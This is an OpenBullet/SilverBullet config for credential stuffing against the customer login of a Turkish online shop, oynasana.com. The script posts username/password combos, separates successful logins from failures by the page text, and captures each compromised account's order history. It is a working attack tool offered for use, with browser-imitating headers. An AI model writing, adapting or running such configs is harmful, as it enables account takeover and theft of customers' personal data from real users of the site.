[SETTINGS]
{
  "Name": "31sjaqsaasadamdır",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-07-25T20:04:04.7259385+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "saas",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "31sjaqsaasadamdır",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://oynasana.com/account/login" 
  CONTENT "form_type=customer_login&utf8=%E2%9C%93&customer%5Bemail%5D=<USER>&customer%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://oynasana.com" 
  HEADER "referer: https://oynasana.com/" 
  HEADER "sec-ch-ua: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Hesap Bilgilerim" 
    KEY "{\"$type\":\"System.Collections.Generic.List`1[[RuriLib.BlockBase, RuriLib]], mscorlib\",\"$values\":[{\"$type\":\"RuriLib.BlockKeycheck, RuriLib\",\"KeyChains\":{\"$type\":\"System.Collections.Generic.List`1[[RuriLib.Models.KeyChain, RuriLib]], mscorlib\",\"$values\":[{\"$type\":\"RuriLib.Models.KeyChain, RuriLib\",\"Type\":0,\"Mode\":0,\"CustomType\":\"CUSTOM\",\"Keys\":{\"$type\":\"System.Collections.ObjectModel.ObservableCollection`1[[RuriLib.Models.Key, RuriLib]], System\",\"$values\":[{\"$type\":\"RuriLib.Models.Key, RuriLib\",\"LeftTerm\":\"<SOURCE>\",\"Comparer\":6,\"RightTerm\":\"Hesap Bilgilerim\"}]}},{\"$type\":\"RuriLib.Models.KeyChain, RuriLib\",\"Type\":1,\"Mode\":0,\"CustomType\":\"CUSTOM\",\"Keys\":{\"$type\":\"System.Collections.ObjectModel.ObservableCollection`1[[RuriLib.Models.Key, RuriLib]], System\",\"$values\":[{\"$type\":\"RuriLib.Models.Key, RuriLib\",\"LeftTerm\":\"<SOURCE>\",\"Comparer\":6,\"RightTerm\":\"Geçersiz giriş bilgileri.\"}]}}]},\"BanOn4XX\":false,\"BanOnToCheck\":true,\"Label\":\"KEY CHECK\",\"Disabled\":false}]}" 
  KEYCHAIN Failure OR 
    KEY "Geçersiz giriş bilgileri." 

PARSE "<SOURCE>" LR "<h2 class=\"small--text-center\">Sipariş Geçmişi</h2>" "/p>" -> VAR "sip" 

PARSE "<sip>" LR "<p>" "<" CreateEmpty=FALSE -> CAP "Sipariş Geçmişi : " 

